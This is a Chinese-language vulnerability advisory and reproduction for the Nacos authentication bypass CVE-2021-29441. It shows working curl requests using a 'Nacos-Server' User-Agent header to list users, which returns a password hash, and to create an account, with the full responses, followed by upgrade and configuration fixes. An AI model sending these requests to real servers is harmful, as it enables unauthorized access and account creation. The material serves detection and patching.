Nacos 存在认证绕过漏洞(CVE-2021-29441)
漏洞描述:
nacos是中国阿里巴巴(Alibaba)的一个动态服务发现、配置和服务管理平台。该软件支持基于 DNS 和基于 RPC 的服务发现,可提供提供实时健康检查,阻止服务向不健康的主机或服务实例发送请求等功能。
Nacos 1.4.1对于User-Agent绕过安全漏洞的serverIdentity key-value修复机制存在实现缺陷,当用户通过/nacos/v1/auth/users/?username=test&password=test访问时,users后的/会导致鉴权被绕过,攻击者仍可调用任意API,进行用户创建、查看等操作。
user-agent为"Nacos-Server"时跳过认证。
影响范围:
com.alibaba.nacos:nacos-common@(-∞, 1.4.1)
复现方式/漏洞检测
请求接口
curl --location 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' \
--header 'User-Agent: Nacos-Server'
请求数据与返回数据
[root@localhost ~]# curl -iv --location 'http://172.16.5.125:31500/nacos/v1/auth/users?pageNo=1&pageSize=9' --header 'User-Agent: Nacos-Server'
* About to connect() to 172.16.5.125 port 31500 (#0)
* Trying 172.16.5.125...
* Connected to 172.16.5.125 (172.16.5.125) port 31500 (#0)
> GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
> Host: 172.16.5.125:31500
> Accept: */*
> User-Agent: Nacos-Server
>
< HTTP/1.1 200
HTTP/1.1 200
< Content-Type: application/json;charset=UTF-8
Content-Type: application/json;charset=UTF-8
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Date: Thu, 30 Mar 2023 08:06:32 GMT
Date: Thu, 30 Mar 2023 08:06:32 GMT
<
* Connection #0 to host 172.16.5.125 left intact
{"totalCount":2,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"}]}
请求接口
curl --location --request POST 'http://127.0.0.1:8848/nacos/v1/auth/users?username=crow&password=crow' \
--header 'User-Agent: Nacos-Server'
请求数据与返回数据
[root@localhost ~]# curl -iv --location --request POST 'http://172.16.5.125:31500/nacos/v1/auth/users?username=crow&password=crow' --header 'User-Agent: Nacos-Server'
* About to connect() to 172.16.5.125 port 31500 (#0)
* Trying 172.16.5.125...
* Connected to 172.16.5.125 (172.16.5.125) port 31500 (#0)
> POST /nacos/v1/auth/users?username=crow&password=crow HTTP/1.1
> Host: 172.16.5.125:31500
> Accept: */*
> User-Agent: Nacos-Server
>
< HTTP/1.1 200
HTTP/1.1 200
< Content-Type: application/json;charset=UTF-8
Content-Type: application/json;charset=UTF-8
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Date: Thu, 30 Mar 2023 08:08:27 GMT
Date: Thu, 30 Mar 2023 08:08:27 GMT
<
* Connection #0 to host 172.16.5.125 left intact
{"code":200,"message":"create user ok!","data":null}
修复方案:
将组件 com.alibaba.nacos:nacos-common 升级至 1.4.1 及以上版本
修改nacos配置
# 关闭白名单 设置为true时, 默认user-agent为"Nacos-Server"会跳过认证
nacos.core.auth.enable.userAgentAuthWhite=false
参考链接:
https://www.oscs1024.com/hd/MPS-2021-5683
https://nvd.nist.gov/vuln/detail/CVE-2021-29441
https://github.com/alibaba/nacos/issues/4701